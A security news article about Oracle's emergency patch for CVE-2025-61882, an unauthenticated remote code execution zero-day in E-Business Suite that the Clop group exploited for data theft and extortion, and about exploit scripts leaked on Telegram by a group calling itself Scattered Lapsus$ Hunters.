Oracle has patched a critical vulnerability in E-Business Suite that was actively exploited in data theft attacks by the Clop group. This is a zero-day vulnerability, registered as CVE-2025-61882, which allows remote code execution on affected systems without authentication.
The flaw is located in the Concurrent Processing component of Oracle E-Business Suite, in the integration with BI Publisher.
According to Oracle, the vulnerability has a CVSS score of 9.8. An attacker can exploit it via the network without a username or password, BleepingComputer reports. In that case, arbitrary code can be executed on the server. The vulnerability affects E-Business Suite versions 12.2.3 through 12.2.14. Oracle has released an emergency patch that can only be installed if the October 2023 Critical Patch Update has been previously applied.
The vulnerability is already being actively exploited by the Clop ransomware group, which stole large amounts of company data in August. Mandiant, part of Google Cloud, confirms that Clop combined multiple vulnerabilities in Oracle EBS, including a number that were fixed in July 2025, and this new zero-day, which was only patched this weekend.
Affected companies later received emails in which Clop claimed to have compromised their Oracle E-Business Suite systems and copied large amounts of documents. The senders demanded payment to prevent the stolen data from being made public.
Same hacker group also behind Salesforce extortion
It is noteworthy that the exploit code for this vulnerability recently appeared on Telegram. The files were shared by a group calling itself Scattered Lapsus$ Hunters. This group claims to consist of members of Scattered Spider, Lapsus$, and ShinyHunters. The club published files that they claim are related to the Clop attacks. The leaked archive contained Python scripts that can be used to exploit a vulnerable E-Business Suite installation, allowing for the opening of a reverse shell or executing commands.
Oracle has since published indicators of compromise that match the leaked exploit files, including specific IP addresses. The company is urging customers to install the emergency patch as soon as possible, as the exploit is publicly available and actively being used.
The hacker group in question also appeared earlier this week in connection with a large-scale extortion threat involving Salesforce, using the same name, Scattered Lapsus$ Hunters. This suggests that a new coalition of well-known cybercriminals, previously active under names such as Lapsus$ and ShinyHunters, is once again responsible for multiple parallel campaigns targeting enterprise software.